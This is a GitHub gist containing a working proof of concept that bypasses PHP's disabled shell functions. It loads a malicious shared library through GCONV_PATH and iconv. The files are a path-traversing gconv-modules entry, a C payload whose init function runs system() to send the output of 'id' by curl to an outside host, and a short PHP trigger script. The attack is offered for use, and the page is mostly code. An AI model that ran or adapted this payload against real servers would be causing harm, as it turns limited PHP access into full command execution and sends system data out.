Skip to content

Instantly share code, notes, and snippets.

@LoadLow

LoadLow/Readme.md

Last active August 14, 2023 13:55
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save LoadLow/90b60bd5535d6c3927bb24d5f9955b80 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save LoadLow/90b60bd5535d6c3927bb24d5f9955b80 to your computer and use it in GitHub Desktop.
Download ZIP
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())
Raw
Readme.md

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses iconv, in php, in order to execute the same payload.

Uses cases :

  • You control the first parameter of iconv (in_charset) and you can upload arbitrary files (.so library file and the gconv-modules file) and you know their path.
  • You have a php RCE but system, shell_exec, curl_exec and other functions are disabled.

In this example, the files gconv-modules and payload.so are stored in /tmp.

Compile the payload library

gcc payload.c -o payload.so -shared -fPIC

Exec the php payload

curl https://mysuperserver.com/poc.php
Raw
gconv-modules
module PAYLOAD// INTERNAL ../../../../../../../../tmp/payload 2
module INTERNAL PAYLOAD// ../../../../../../../../tmp/payload 2
Raw
payload.c
#include <stdio.h>
#include <stdlib.h>
void gconv() {}
void gconv_init() {
puts("pwned");
system("id=`id`;curl http://foo.bar --data \"$id\"");
exit(0);
}
Raw
poc.php
putenv("GCONV_PATH=/tmp");
iconv("payload", "UTF-8", "whatever");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment